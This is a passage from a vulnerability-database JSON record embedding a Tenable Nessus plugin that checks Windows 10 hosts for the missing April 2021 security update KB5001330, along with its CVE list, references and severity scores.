"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28354", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28327", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28315", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28439", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28319", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28309", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27093", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28310", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28329", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28338", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28332", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26415", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28348", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28436", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28435", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28344", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28351", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28356", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28345", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27072", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28442", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28334", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28322", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27090", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28337", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26417", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28320", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28314", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28331", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26416", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27094", "https://support.microsoft.com/en-us/help/5001330", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28443", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27095", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26413", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27088", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28335", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28346", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27089", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28326", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27079", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28312", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28330", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28352", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28325", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28445", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28333", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27096", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28318", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28336", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28339", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28446", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28357", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28313", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28311", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28441", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28321", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27086", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28353", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28316", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28355", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28343", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28323", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28440", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28328", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28358", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28434", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28349", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28341", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28437", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28447", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28350", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28317", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28340", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28347", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27092"], "cvelist": ["CVE-2021-26413", "CVE-2021-26415", "CVE-2021-26416", "CVE-2021-26417", "CVE-2021-27072", "CVE-2021-27079", "CVE-2021-27086", "CVE-2021-27088", "CVE-2021-27089", "CVE-2021-27090", "CVE-2021-27092", "CVE-2021-27093", "CVE-2021-27094", "CVE-2021-27095", "CVE-2021-27096", "CVE-2021-28309", "CVE-2021-28310", "CVE-2021-28311", "CVE-2021-28312", "CVE-2021-28313", "CVE-2021-28314", "CVE-2021-28315", "CVE-2021-28316", "CVE-2021-28317", "CVE-2021-28318", "CVE-2021-28319", "CVE-2021-28320", "CVE-2021-28321", "CVE-2021-28322", "CVE-2021-28323", "CVE-2021-28324", "CVE-2021-28325", "CVE-2021-28326", "CVE-2021-28327", "CVE-2021-28328", "CVE-2021-28329", "CVE-2021-28330", "CVE-2021-28331", "CVE-2021-28332", "CVE-2021-28333", "CVE-2021-28334", "CVE-2021-28335", "CVE-2021-28336", "CVE-2021-28337", "CVE-2021-28338", "CVE-2021-28339", "CVE-2021-28340", "CVE-2021-28341", "CVE-2021-28342", "CVE-2021-28343", "CVE-2021-28344", "CVE-2021-28345", "CVE-2021-28346", "CVE-2021-28347", "CVE-2021-28348", "CVE-2021-28349", "CVE-2021-28350", "CVE-2021-28351", "CVE-2021-28352", "CVE-2021-28353", "CVE-2021-28354", "CVE-2021-28355", "CVE-2021-28356", "CVE-2021-28357", "CVE-2021-28358", "CVE-2021-28434", "CVE-2021-28435", "CVE-2021-28436", "CVE-2021-28437", "CVE-2021-28438", "CVE-2021-28439", "CVE-2021-28440", "CVE-2021-28441", "CVE-2021-28442", "CVE-2021-28443", "CVE-2021-28444", "CVE-2021-28445", "CVE-2021-28446", "CVE-2021-28447"], "immutableFields": [], "lastseen": "2021-09-18T00:18:04", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001340.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_VISUAL_STUDIO.NASL"]}, {"type": "kaspersky", "idList": ["KLA12142", "KLA12139"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"]}, {"type": "attackerkb", "idList": ["AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65"]}, {"type": "cve", "idList": ["CVE-2021-27086", "CVE-2021-28441", "CVE-2021-27090", "CVE-2021-27092", "CVE-2021-28312", "CVE-2021-27088", "CVE-2021-28436", "CVE-2021-28324", "CVE-2021-28442", "CVE-2021-28314"]}, {"type": "mskb", "idList": ["KB5001330", "KB5001292"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2021-28440/", "MSF:ILITIES/MSFT-CVE-2021-28325/", "MSF:ILITIES/MSFT-CVE-2021-27079/", "MSF:ILITIES/MSFT-CVE-2021-26413/", "MSF:ILITIES/MSFT-CVE-2021-28318/"]}], "modified": "2021-09-18T00:18:04", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-18T00:18:04", "rev": 2}}, "objectVersion": "1.6", "pluginID": "149259", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149259);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/09/17\");\n\n script_cve_id(\n \"CVE-2021-26413\",\n \"CVE-2021-26415\",\n \"CVE-2021-26416\",\n \"CVE-2021-26417\",\n \"CVE-2021-27072\",\n \"CVE-2021-27079\",\n \"CVE-2021-27086\",\n \"CVE-2021-27088\",\n \"CVE-2021-27089\",\n \"CVE-2021-27090\",\n \"CVE-2021-27092\",\n \"CVE-2021-27093\",\n \"CVE-2021-27094\",\n \"CVE-2021-27095\",\n \"CVE-2021-27096\",\n \"CVE-2021-28309\",\n \"CVE-2021-28310\",\n \"CVE-2021-28311\",\n \"CVE-2021-28312\",\n \"CVE-2021-28313\",\n \"CVE-2021-28314\",\n \"CVE-2021-28315\",\n \"CVE-2021-28316\",\n \"CVE-2021-28317\",\n \"CVE-2021-28318\",\n \"CVE-2021-28319\",\n \"CVE-2021-28320\",\n \"CVE-2021-28321\",\n \"CVE-2021-28322\",\n \"CVE-2021-28323\",\n \"CVE-2021-28324\",\n \"CVE-2021-28325\",\n \"CVE-2021-28326\",\n \"CVE-2021-28327\",\n \"CVE-2021-28328\",\n \"CVE-2021-28329\",\n \"CVE-2021-28330\",\n \"CVE-2021-28331\",\n \"CVE-2021-28332\",\n \"CVE-2021-28333\",\n \"CVE-2021-28334\",\n \"CVE-2021-28335\",\n \"CVE-2021-28336\",\n \"CVE-2021-28337\",\n \"CVE-2021-28338\",\n \"CVE-2021-28339\",\n \"CVE-2021-28340\",\n \"CVE-2021-28341\",\n \"CVE-2021-28342\",\n \"CVE-2021-28343\",\n \"CVE-2021-28344\",\n \"CVE-2021-28345\",\n \"CVE-2021-28346\",\n \"CVE-2021-28347\",\n \"CVE-2021-28348\",\n \"CVE-2021-28349\",\n \"CVE-2021-28350\",\n \"CVE-2021-28351\",\n \"CVE-2021-28352\",\n \"CVE-2021-28353\",\n \"CVE-2021-28354\",\n \"CVE-2021-28355\",\n \"CVE-2021-28356\",\n \"CVE-2021-28357\",\n \"CVE-2021-28358\",\n \"CVE-2021-28434\",\n \"CVE-2021-28435\",\n \"CVE-2021-28436\",\n \"CVE-2021-28437\",\n \"CVE-2021-28438\",\n \"CVE-2021-28439\",\n \"CVE-2021-28440\",\n \"CVE-2021-28441\",\n \"CVE-2021-28442\",\n \"CVE-2021-28443\",\n \"CVE-2021-28444\",\n \"CVE-2021-28445\",\n \"CVE-2021-28446\",\n \"CVE-2021-28447\"\n );\n script_xref(name:\"MSKB\", value:\"5001330\");\n script_xref(name:\"IAVA\", value:\"2021-A-0168-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429\");\n script_xref(name:\"MSFT\", value:\"MS21-5001330\");\n\n script_name(english:\"KB5001330: Windows 10 Version 2004 / Windows 10 Version 20H2 Security Update (April 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. Note that\nNessus has not tested for this issue but has instead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5001330\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5001330 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27092\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin, kbs, share;\n\nbulletin = 'MS21-04';\nkbs = make_list(\n '5001330'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n)\n\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released KB5001330 to address this issue.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2021-27092", "vpr": {"risk factor": "Critical", "score": "9.5"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2021-04-13T00:00:00", "vulnerabilityPublicationDate": "2021-04-13T00:00:00", "exploitableWith": []}, "lastseen": "2021-09-18T00:18:04", "differentElements": ["modified"], "edition": 14}, {"bulletin": {"id": "SMB_NT_MS21_APR_5001330.NASL", "hash": "78f9dd9e7e421365ff63b6e5bac2df8a", "type": "nessus", "bulletinFamily": "scanner", "title": "KB5001330: Windows 10 Version 2004 / Windows 10 Version 20H2 Security Update (April 2021)", "description": "The remote Windows host is missing a security update. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-05-05T00:00:00", "modified": "2021-09-17T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/149259", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28320", "https://support.microsoft.com/en-us/help/5001330", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27095", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28328", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28342", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28355", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28436", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27072", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28326", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28324", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28352", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28312", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26417", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28330", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28315", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27089", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28344", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28318", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28440", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28317", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28336", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28311", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28447", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27096", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28340", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28357", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27093", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28346", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28309", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28348", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28322", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28329", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28347", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28337", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28332", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28358", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28331", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28356", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28327", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27086", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28313", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28444", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28437", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28338", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28442", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27090", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28434", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27092", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28325", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28345", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28343", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28439", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28314", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28350", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28349", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26415", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26413", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28319", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28321", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28316", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28443", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28335", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27094", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28333", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28354", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28446", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28441", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28438", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26416", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28323", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28353", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28341", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28339", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28310", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28334", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28445", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27079", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28351", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28435", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27088"], "cvelist": ["CVE-2021-26413", "CVE-2021-26415", "CVE-2021-26416", "CVE-2021-26417", "CVE-2021-27072", "CVE-2021-27079", "CVE-2021-27086", "CVE-2021-27088", "CVE-2021-27089", "CVE-2021-27090", "CVE-2021-27092", "CVE-2021-27093", "CVE-2021-27094", "CVE-2021-27095", "CVE-2021-27096", "CVE-2021-28309", "CVE-2021-28310", "CVE-2021-28311", "CVE-2021-28312", "CVE-2021-28313", "CVE-2021-28314", "CVE-2021-28315", "CVE-2021-28316", "CVE-2021-28317", "CVE-2021-28318", "CVE-2021-28319", "CVE-2021-28320", "CVE-2021-28321", "CVE-2021-28322", "CVE-2021-28323", "CVE-2021-28324", "CVE-2021-28325", "CVE-2021-28326", "CVE-2021-28327", "CVE-2021-28328", "CVE-2021-28329", "CVE-2021-28330", "CVE-2021-28331", "CVE-2021-28332", "CVE-2021-28333", "CVE-2021-28334", "CVE-2021-28335", "CVE-2021-28336", "CVE-2021-28337", "CVE-2021-28338", "CVE-2021-28339", "CVE-2021-28340", "CVE-2021-28341", "CVE-2021-28342", "CVE-2021-28343", "CVE-2021-28344", "CVE-2021-28345", "CVE-2021-28346", "CVE-2021-28347", "CVE-2021-28348", "CVE-2021-28349", "CVE-2021-28350", "CVE-2021-28351", "CVE-2021-28352", "CVE-2021-28353", "CVE-2021-28354", "CVE-2021-28355", "CVE-2021-28356", "CVE-2021-28357", "CVE-2021-28358", "CVE-2021-28434", "CVE-2021-28435", "CVE-2021-28436", "CVE-2021-28437", "CVE-2021-28438", "CVE-2021-28439", "CVE-2021-28440", "CVE-2021-28441", "CVE-2021-28442", "CVE-2021-28443", "CVE-2021-28444", "CVE-2021-28445", "CVE-2021-28446", "CVE-2021-28447"], "immutableFields": [], "lastseen": "2021-09-18T23:46:32", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001340.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_VISUAL_STUDIO.NASL"]}, {"type": "kaspersky", "idList": ["KLA12139", "KLA12142"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"]}, {"type": "attackerkb", "idList": ["AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65"]}, {"type": "cve", "idList": ["CVE-2021-27086", "CVE-2021-28441", "CVE-2021-28314", "CVE-2021-28436", "CVE-2021-26416", "CVE-2021-28324", "CVE-2021-28442", "CVE-2021-27090", "CVE-2021-28312", "CVE-2021-27092"]}, {"type": "mskb", "idList": ["KB5001330", "KB5001292"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2021-28325/", "MSF:ILITIES/MSFT-CVE-2021-26413/", "MSF:ILITIES/MSFT-CVE-2021-27079/", "MSF:ILITIES/MSFT-CVE-2021-28318/", "MSF:ILITIES/MSFT-CVE-2021-28440/"]}], "modified": "2021-09-18T23:46:32", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-18T23:46:32", "rev": 2}}, "objectVersion": "1.6", "pluginID": "149259", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149259);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/09/17\");\n\n script_cve_id(\n \"CVE-2021-26413\",\n \"CVE-2021-26415\",\n \"CVE-2021-26416\",\n \"CVE-2021-26417\",\n \"CVE-2021-27072\",\n \"CVE-2021-27079\",\n \"CVE-2021-27086\",\n \"CVE-2021-27088\",\n \"CVE-2021-27089\",\n \"CVE-2021-27090\",\n \"CVE-2021-27092\",\n \"CVE-2021-27093\",\n \"CVE-2021-27094\",\n \"CVE-2021-27095\",\n \"CVE-2021-27096\",\n \"CVE-2021-28309\",\n \"CVE-2021-28310\",\n \"CVE-2021-28311\",\n \"CVE-2021-28312\",\n \"CVE-2021-28313\",\n \"CVE-2021-28314\",\n \"CVE-2021-28315\",\n \"CVE-2021-28316\",\n \"CVE-2021-28317\",\n \"CVE-2021-28318\",\n \"CVE-2021-28319\",\n \"CVE-2021-28320\",\n \"CVE-2021-28321\",\n \"CVE-2021-28322\",\n \"CVE-2021-28323\",\n \"CVE-2021-28324\",\n \"CVE-2021-28325\",\n \"CVE-2021-28326\",\n \"CVE-2021-28327\",\n \"CVE-2021-28328\",\n \"CVE-2021-28329\",\n \"CVE-2021-28330\",\n \"CVE-2021-28331\",\n \"CVE-2021-28332\",\n \"CVE-2021-28333\",\n \"CVE-2021-28334\",\n \"CVE-2021-28335\",\n \"CVE-2021-28336\",\n \"CVE-2021-28337\",\n \"CVE-2021-28338\",\n \"CVE-2021-28339\",\n \"CVE-2021-28340\",\n \"CVE-2021-28341\",\n \"CVE-2021-28342\",\n \"CVE-2021-28343\",\n \"CVE-2021-28344\",\n \"CVE-2021-28345\",\n \"CVE-2021-28346\",\n \"CVE-2021-28347\",\n \"CVE-2021-28348\",\n \"CVE-2021-28349\",\n \"CVE-2021-28350\",\n \"CVE-2021-28351\",\n \"CVE-2021-28352\",\n \"CVE-2021-28353\",\n \"CVE-2021-28354\",\n \"CVE-2021-28355\",\n \"CVE-2021-28356\",\n \"CVE-2021-28357\",\n \"CVE-2021-28358\",\n \"CVE-2021-28434\",\n \"CVE-2021-28435\",\n \"CVE-2021-28436\",\n \"CVE-2021-28437\",\n \"CVE-2021-28438\",\n \"CVE-2021-28439\",\n \"CVE-2021-28440\",\n \"CVE-2021-28441\",\n \"CVE-2021-28442\",\n \"CVE-2021-28443\",\n \"CVE-2021-28444\",\n \"CVE-2021-28445\",\n \"CVE-2021-28446\",\n \"CVE-2021-28447\"\n );\n script_xref(name:\"MSKB\", value:\"5001330\");\n script_xref(name:\"IAVA\", value:\"2021-A-0168-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429\");\n script_xref(name:\"MSFT\", value:\"MS21-5001330\");\n\n 